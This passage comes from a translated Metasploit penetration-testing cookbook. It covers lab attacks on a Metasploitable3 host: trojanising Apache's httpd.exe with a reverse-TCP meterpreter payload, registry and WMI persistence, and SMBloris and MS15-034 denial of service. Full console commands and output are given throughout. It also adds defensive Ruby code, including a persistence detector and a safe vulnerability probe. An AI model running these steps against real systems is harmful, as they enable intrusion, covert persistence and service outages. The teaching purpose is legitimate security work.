  meterpreter > kill 3880
  Killing: 3880
  meterpreter >

2. Download the binary that will be replaced with the backdoored version.

  meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
  [*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  [*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  [*] download : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
  meterpreter >

3. Background the session, select the reverse_tcp payload and build the backdoored executable with generate. -x uses the downloaded httpd.exe as the template and -k preserves the template's own behaviour by running the payload in a new thread, so the web server keeps working after the swap.

  msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
  msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
  [*] Writing 29184 bytes to /root/httpd-backdoored.exe...
  msf5 payload(windows/x64/meterpreter/reverse_tcp) >

The generate options are described in its help output:

  msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
  Usage: generate [options]
  Generates a payload.
  OPTIONS:
  -E Force encoding
  -O <opt> Deprecated: alias for the '-o' option
  -P <opt> Total desired payload size, auto-produce approproate NOPsled length
  -S <opt> The new section name to use when generating (large) Windows binaries
  -b <opt> The list of characters to avoid example: '\x00\xff'
  -e <opt> The encoder to use
  -f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
  -h Show this message
  -i <opt> The number of times to encode the payload
  -k Preserve the template behavior and inject the payload as a new thread
  -n <opt> Prepend a nopsled of [length] size on to the payload
  -o <opt> The output file name (otherwise stdout)
  -p <opt> The platform of the payload
  -s <opt> NOP sled length.
  -x <opt> Specify a custom executable file to use as a template

4. Start a handler for the backdoor's reverse connection and put it in the background with exploit -j.

  msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(multi/handler) > exploit -j
  [*] Exploit running as background job 0.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 192.168.177.143:4444
  msf5 exploit(multi/handler) >

5. Switch back to the earlier meterpreter session, upload the backdoored file and rename it into place, keeping the original as httpd.exe.backup.

  msf5 exploit(multi/handler) > sessions -i 3
  [*] Starting interaction with 3...
  meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
  meterpreter > mv httpd.exe httpd.exe.backup
  meterpreter > upload /root/httpd-backdoored.exe
  [*] uploading : /root/http-backdoored.exe -> httpd-backdoored.exe
  [*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
  [*] uploaded : /root/httpd-backdoored.exe -> httpd-backdoored.exe
  meterpreter > mv httpd-backdoored.exe httpd.exe
  meterpreter >

6. Drop into a system shell with the shell command and restart the wampapache service.

  meterpreter > shell
  Process 1976 created.
  Channel 3 created.
  Microsoft Windows [Version 6.1.7601]
  Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
  net stop wampapache
  The wampapache service is stopping.
  The wampapache service was stopped successfully.
  C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache
  [*] Sending stage (206403 bytes) to 192.168.177.144
  net start wampapache
  The wampapache service is starting.
  The wampapache service was started successfully.

As soon as the service starts, new sessions arrive at the handler. There are two of them because Apache runs a parent and a child httpd.exe and both execute the backdoored image. Note that they run as the service account, NT AUTHORITY\LOCAL SERVICE, not as SYSTEM like the session we started from: a backdoored service binary only ever gives you the privileges of that service.

  C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
  [*] Sending stage (206403 bytes) to 192.168.177.144
  [*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
  ....
  msf5 exploit(multi/handler) > sessions -l
  Active sessions
  ===============
  Id Name Type Information Connection
  -- ---- ---- ----------- ----------
  3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  4 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  5 meterpreter x64/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)
  msf5 exploit(multi/handler) >

7. Plant a backdoor with the Windows registry persistence module. Here we use the session obtained with the EternalBlue exploit.

  msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
  msf5 exploit(windows/local/registry_persistence) > set SESSION 6
  SESSION => 6
  msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
  msf5 exploit(windows/local/registry_persistence) > exploit
  [*] Generating payload blob..
  [+] Generated payload, 5944 bytes
  [*] Root path is HKCU
  [*] Installing payload blob..
  [+] Created registry key HKCU\Software\cPH3pG4G
  [+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
  [*] Installing run key
  [-] Exploit aborted due to failure: unknown: Could not install run key
  msf5 exploit(windows/local/registry_persistence) >

In this environment the installation did not succeed. One likely reason is the session itself: it runs as SYSTEM, so HKCU resolves to the SYSTEM profile hive (HKU\.DEFAULT) rather than to a user who ever logs on interactively. Either set STARTUP to SYSTEM so that the module uses the HKLM run key instead (this needs administrative rights, which a SYSTEM session has), or migrate into a logged-on user's process before running the module with the default STARTUP of USER. Note that the blob key HKCU\Software\cPH3pG4G was created before the failure and should be cleaned up.

8. If it succeeds, set up a handler so that the reverse shell session is caught when the target reboots.

  msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(multi/handler) > set LPORT 9999
  LPORT => 9999
  msf5 exploit(multi/handler) > exploit -j
  [*] Exploit running as background job 1.
  [*] Exploit completed, but no session was created.
  [*] Started reverse TCP handler on 192.168.177.143:9999
  msf5 exploit(multi/handler) >

9. After the target reboots, the session comes back.

  meterpreter > reboot
  Rebooting...

10. Create a fileless backdoor with a WMI event subscription. With the module's default PERSISTENCE_METHOD, EVENT, the payload fires when a Security log event with the given ID is written for the given user name; 4624 together with Administrator means every successful Administrator logon. CALLBACK_INTERVAL is given in milliseconds.

  msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
  msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
  SESSION => 1
  msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 // callback interval of one minute (milliseconds)
  CALLBACK_INTERVAL => 60000
  msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 // event ID: successful logon
  EVENT_ID_TRIGGER => 4624
  msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator // user whose logon fires the trigger
  USERNAME_TRIGGER => Administrator
  msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
  LPORT => 4433
  msf5 exploit(windows/local/wmi_persistence) > exploit
  [-] This module cannot run as System

11. The module refuses to run from a SYSTEM session. Use migrate to move the meterpreter into a process that belongs to a logged-on user, which is in any case a more stable host process than the one the exploit left us in; explorer.exe is the usual choice.

  msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
  [*] Starting interaction with 1...
  meterpreter > ps
  Process List
  ============
  PID PPID Name Arch Session User Path
  --- ---- ---- ---- ------- ---- ----
  0 0 [System Process]
  4 0 System x64 0
  232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
  300 472 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  316 304 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  324 5624 explorer.exe x64 1 METASPLOITABLE3\vagrant C:\Windows\Explorer.EXE
  .....
  meterpreter > migrate -N explorer.exe // migration does not succeed every time; retry if it fails
  [*] Migrating from 1088 to 5624...
  [*] Migration completed successfully.
  meterpreter >

Then run the module again:

  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(windows/local/wmi_persistence) > exploit
  [*] Installing Persistence...
  [+] - Bytes remaining: 12560
  [+] - Bytes remaining: 4560
  [+] Payload successfully staged.
  [+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
  [*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
  msf5 exploit(windows/local/wmi_persistence) >

Log Administrator off the target and log back on, and msfconsole receives the callback. The smbclient hint printed by the module is written for its default trigger, a failed logon (event 4625), where an arbitrary password is enough; with 4624 a genuine Administrator logon is required. The callback session runs as SYSTEM regardless of who logged on, because permanent WMI event consumers execute in the WMI provider host's context. Keep the generated .rc file: it removes the filter, consumer and binding again when the engagement ends.

  [*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800
  msf5 exploit(multi/handler) > sessions -i 2
  [*] Starting interaction with 2...
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer : METASPLOITABLE3
  OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture : x64
  System Language : en_US
  Domain : WORKGROUP
  Logged On Users : 2
  Meterpreter : x86/windows
  meterpreter >
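Both backdoors above leave artifacts a defender can enumerate: registry_persistence stores the payload blob under HKCU\Software\<random> and points a Run key value at it, and wmi_persistence stores a __EventFilter, an event consumer and a __FilterToConsumerBinding in root\subscription. The Ruby below is an added example, not code from the book or from Metasploit: the collectors read those two locations on a Windows host (win32/registry and win32ole ship with Ruby's standard library there; elsewhere they return nothing), and the scoring is pure Ruby run over constructed entries. The suspicious-pattern list, the entry names and the command lines are assumptions made for the example.

```ruby
# Added example: enumerate and score the two persistence locations used above.
# Not part of the book or of Metasploit. Collectors work on Windows only; the
# scoring runs anywhere on the constructed entries.
RUN_KEYS = [
  'Software\\Microsoft\\Windows\\CurrentVersion\\Run',
  'Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce',
].freeze

# Traits of the PowerShell stagers both modules plant (assumed list; extend it)
SUSPICIOUS = [
  /powershell(\.exe)?\b.*(-enc|-e\b|-encodedcommand)/i,   # encoded command
  /-w(indowstyle)?\s+hidden/i,                             # hidden window
  /-nop\b|-noprofile/i,
  /Get-ItemProperty\s+HK(CU|LM):/i,                        # payload blob read back from the registry
  /\b(rundll32|regsvr32|mshta|wscript|cscript)\b/i,
  /\.(bat|vbs|ps1|hta)\b/i,
].freeze

Entry = Struct.new(:source, :name, :command)

def suspicious?(command)
  SUSPICIOUS.any? { |re| re.match?(command.to_s) }
end

def score(entries)
  entries.select { |e| suspicious?(e.command) }
end

# Run keys of HKCU and HKLM (registry_persistence writes HKCU by default, HKLM with STARTUP=SYSTEM)
def collect_run_keys
  require 'win32/registry'
  entries = []
  [Win32::Registry::HKEY_CURRENT_USER, Win32::Registry::HKEY_LOCAL_MACHINE].each do |hive|
    RUN_KEYS.each do |path|
      begin
        hive.open(path) do |key|
          key.each_value { |name, _type, data| entries << Entry.new("#{hive.keyname}\\#{path}", name, data) }
        end
      rescue Win32::Registry::Error
        next   # key absent in this hive
      end
    end
  end
  entries
rescue LoadError, StandardError
  []       # not Windows, or registry not reachable
end

# Permanent WMI event subscriptions: every filter-to-consumer binding in root\subscription
def collect_wmi_subscriptions
  require 'win32ole'
  wmi = WIN32OLE.connect('winmgmts:\\\\.\\root\\subscription')
  entries = []
  wmi.ExecQuery('SELECT * FROM __FilterToConsumerBinding').each do |bind|
    filter   = wmi.Get(bind.Filter)      # __EventFilter: Name, Query (WQL)
    consumer = wmi.Get(bind.Consumer)    # CommandLineEventConsumer / ActiveScriptEventConsumer
    command  = if consumer.ole_respond_to?(:CommandLineTemplate) then consumer.CommandLineTemplate
               elsif consumer.ole_respond_to?(:ScriptText)       then consumer.ScriptText
               else ''
               end
    entries << Entry.new("root\\subscription [#{filter.Query}]", filter.Name, command)
  end
  entries
rescue LoadError, StandardError
  []
end

# Constructed entries: one benign Run value, one shaped like the run key
# registry_persistence would add for the blob created above, one shaped like a
# wmi_persistence consumer. None of these was captured from the target.
SAMPLE_ENTRIES = [
  Entry.new('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'OneDrive',
            '"C:\\Users\\vagrant\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
  Entry.new('HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', 'q3jhQYTs',
            'powershell.exe -nop -w hidden -c "IEX (Get-ItemProperty HKCU:\\Software\\cPH3pG4G).q3jhQYTs"'),
  Entry.new('root\\subscription [SELECT * FROM __InstanceCreationEvent WHERE TargetInstance ISA \'Win32_NTLogEvent\']',
            'Updater', 'powershell.exe -NoP -W Hidden -EncodedCommand <base64 blob>'),
].freeze

if __FILE__ == $0
  (collect_run_keys + collect_wmi_subscriptions + SAMPLE_ENTRIES).each do |e|
    puts "#{suspicious?(e.command) ? 'SUSPICIOUS' : 'ok        '} #{e.source} :: #{e.name} => #{e.command}"
  end
end
```

Run it on the target after step 11 and the Updater-style binding shows up with the module's PowerShell consumer; a WMI binding whose consumer runs PowerShell at all is rare enough on a server that it deserves a look even without a pattern hit.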

9. Denial of service attacks

A denial of service attack either floods the target with resource-consuming requests or triggers a vulnerability, exhausting the target's capacity so that legitimate users can no longer reach a service or resource, and sometimes crashing the service or the operating system outright.

Getting ready

SMBloris is a Windows SMB vulnerability that was already some 20 years old when it was disclosed in 2017. It allows a denial of service that can take down large servers, affects every version of the SMB protocol, and every Windows version since Windows 2000.

How to do it

1. Before launching SMBloris, raise the open file (socket) limit on the attacking machine. The limit applies to the shell you set it in and to processes started from that shell, so start msfconsole from that same shell afterwards.

  root@osboxes:~# ulimit -n 65535
  root@osboxes:~# ulimit -n
  65535
  root@osboxes:~#

2. Then attack the target with the smb_loris module.

  msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
  RHOST => 192.168.177.144
  msf5 auxiliary(dos/smb/smb_loris) > run
  [*] Starting server...
  [*] 192.168.177.144:445 - 100 socket(s) open
  [*] 192.168.177.144:445 - 200 socket(s) open
  [*] 192.168.177.144:445 - 300 socket(s) open
  [*] 192.168.177.144:445 - 400 socket(s) open
  [*] 192.168.177.144:445 - 500 socket(s) open
  [*] 192.168.177.144:445 - 600 socket(s) open
  [*] 192.168.177.144:445 - 700 socket(s) open
  [*] 192.168.177.144:445 - 800 socket(s) open
  [*] 192.168.177.144:445 - 900 socket(s) open
  [*] 192.168.177.144:445 - 1000 socket(s) open
  [!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
  [*] 192.168.177.144:445 - 1017 socket(s) open
  [*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open

3. Looking at the target, you can see that the flood of SMB connections eats a large amount of its memory. For every NBSS (NetBIOS session service) connection the server allocates up to 128 KB of non-paged pool for the message the client has announced, before any data arrives, so enough held-open connections exhaust memory and deny service. The run above stalled at 1017 sockets, which is the default limit of 1024 descriptors minus the ones msfconsole already had open: the ulimit from step 1 did not reach the msfconsole process, so the module holds steady instead of growing further.
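The allocation described above comes from the NetBIOS session service framing rather than from SMB itself, which is why every SMB version since Windows 2000 is affected. The Ruby below is an added example, not code from the book or from Metasploit: it shows the 4-byte NBSS header whose 17-bit length field lets a client announce a 0x1FFFF-byte message (the server reserves that much non-paged pool before a single payload byte arrives), and the arithmetic of holding many such connections open. It is framing only; it opens no sockets.

```ruby
# Added example: NBSS framing as abused by SMBloris. Not part of the book or of
# Metasploit; nothing here talks to the network.
NBSS_SESSION_MESSAGE = 0x00
NBSS_MAX_LENGTH      = 0x1FFFF   # 17-bit length: 16 bits in the length word + 1 bit in flags

# NBSS header: type(1) | flags(1) | length(2, big-endian); bit 0 of flags is bit 16 of the length.
def nbss_header(length, type: NBSS_SESSION_MESSAGE)
  raise ArgumentError, 'length does not fit in 17 bits' unless (0..NBSS_MAX_LENGTH).cover?(length)
  [type, (length >> 16) & 0x01, length & 0xFFFF].pack('C C n')
end

def parse_nbss(bytes)
  type, flags, low = bytes.unpack('C C n')
  { type: type, length: ((flags & 0x01) << 16) | low }
end

# Bytes the attacker sends per connection: the header alone, the body never follows
ATTACKER_BYTES_PER_CONNECTION = 4

# Non-paged pool the server sets aside for n idle connections that each announce the maximum
def victim_pool_bytes(connections)
  connections * NBSS_MAX_LENGTH
end

# Bytes pinned on the victim per byte sent by the attacker
def amplification(connections)
  victim_pool_bytes(connections) / (connections * ATTACKER_BYTES_PER_CONNECTION)
end

# Connections a descriptor limit allows after the ones the process already holds
# (the run above stalled at 1017 with the default limit of 1024).
def usable_connections(fd_limit, already_open)
  [fd_limit - already_open, 0].max
end

if __FILE__ == $0
  hdr = nbss_header(NBSS_MAX_LENGTH)
  puts "header announcing 0x1FFFF bytes: #{hdr.unpack1('H*')}"
  [usable_connections(1024, 7), usable_connections(65_535, 7)].each do |n|
    puts "#{n} connections pin about #{victim_pool_bytes(n) / (1024 * 1024)} MiB of non-paged pool"
  end
  puts "amplification: #{amplification(1)}x"
end
```

With the raised limit a single attacker process can hold about 65,000 connections, each costing it four bytes and a socket while costing the victim 128 KiB of non-paged pool, which is why the fix on the server side (rate limiting and connection quotas, or not exposing 445 at all) matters more than any patch.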

Another devastating DoS is MS15-034, the HTTP protocol stack (HTTP.sys) request handling denial of service.

If a Windows 7, Windows 8/8.1, Windows Server 2008 R2 or Windows Server 2012/2012 R2 machine runs IIS with the vulnerable HTTP.sys, this module crashes the server. The module first probes the target with a harmless Range request and only sends the crashing request when the reply indicates a vulnerable HTTP.sys; if a crash is not acceptable, run only the module's check command.

  msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
  msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit
  [*] DOS request sent
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed
  msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >

The target blue-screens, as you can see. Recovering from it takes a reboot, so use this only where an outage has been agreed with the client.
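Since the module's request is destructive, it is worth knowing the harmless probe the MS15-034 checks rely on: a Range header whose upper bound is 2^64-1 (18446744073709551615) with a lower bound of 0. An unpatched HTTP.sys answers 416 Requested Range Not Satisfiable; a patched one rejects the header with 400 Bad Request and the text "The request has an invalid header name"; a server that is not HTTP.sys answers something else. The crash variant moves the lower bound so the length arithmetic wraps (the Metasploit module uses bytes=18-18446744073709551615) and is deliberately not built here. The Ruby below is an added example, not code from the book or from Metasploit; the two responses are constructed, and the status text matched is the one documented for the public checks.

```ruby
# Added example: non-destructive MS15-034 probe and reply classification.
# Not part of the book or of Metasploit; sample responses are constructed.
require 'socket'   # used only by the optional live probe at the bottom

CHECK_RANGE = 'bytes=0-18446744073709551615'   # upper bound 2**64 - 1, lower bound 0: safe

def ms15_034_request(host, path = '/')
  "GET #{path} HTTP/1.1\r\nHost: #{host}\r\nRange: #{CHECK_RANGE}\r\nConnection: close\r\n\r\n"
end

def classify_ms15_034(response)
  status_line, *rest = response.to_s.split("\r\n")
  code = status_line.to_s[%r{\AHTTP/1\.[01] (\d{3})}, 1].to_i
  body = rest.join("\n")
  if code == 416
    :vulnerable                      # HTTP.sys accepted the range and failed only on the bounds
  elsif code == 400 && body.include?('The request has an invalid header name')
    :patched                         # post-MS15-034 HTTP.sys rejects the range outright
  else
    :not_http_sys_or_unknown         # e.g. 200/206 from Apache or a proxy in front of IIS
  end
end

# Constructed replies modelled on an unpatched and a patched IIS 7.5
SAMPLE_VULNERABLE = "HTTP/1.1 416 Requested Range Not Satisfiable\r\nContent-Type: text/html\r\nServer: Microsoft-IIS/7.5\r\nContent-Length: 0\r\n\r\n"
SAMPLE_PATCHED    = "HTTP/1.1 400 Bad Request\r\nContent-Type: text/html\r\nServer: Microsoft-HTTPAPI/2.0\r\n\r\n<h1>Bad Request</h1><p>HTTP Error 400. The request has an invalid header name.</p>"

# Optional live probe; sends only the safe request
def probe_ms15_034(host, port = 80)
  sock = TCPSocket.new(host, port)
  sock.write(ms15_034_request(host))
  classify_ms15_034(sock.read)
ensure
  sock&.close
end

if __FILE__ == $0
  puts "unpatched sample: #{classify_ms15_034(SAMPLE_VULNERABLE)}"
  puts "patched sample:   #{classify_ms15_034(SAMPLE_PATCHED)}"
  puts probe_ms15_034(ARGV[0]) if ARGV[0]
end
```

The probe asks for a range on whatever the path serves; the crash additionally needs a static file that HTTP.sys caches in kernel mode, which is why the module targets default IIS content.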

Related hands-on labs

Metasploit attacking Linux example

Metasploit attacking Windows Server 2008 example

Chapter 4: Meterpreter (preview)

In that chapter we will learn the following:

1. Understanding Meterpreter core commands

2. Understanding Meterpreter filesystem commands

3. Understanding Meterpreter networking commands

4. Understanding Meterpreter system commands

5. Setting up multiple communication channels with the target

6. Meterpreter anti-forensics

7. Screen and keystroke capture

8. Using the scraper Meterpreter script

9. Using winenum to enumerate system information

10. Automation with scripts

11. Meterpreter resource scripts

12. Meterpreter timeout control

13. Meterpreter sleep control

14. Meterpreter transports

15. Registry manipulation

16. Loading framework plugins

17. APIs and mixins

18. Railgun: turning Ruby into a weapon

19. Adding DLL and function definitions to Railgun

20. Hijacking remote VNC

21. Enabling remote desktop

Notes

Original book: Metasploit Penetration Testing Cookbook - Third Edition

www.packtpub.com/networking-…

Translated by 泓源视野; please credit the source when reposting.

 


Published on 泓源视野 by admin. The content reflects the author's own views, not necessarily those of 泓源视野. Please credit the source when reposting.
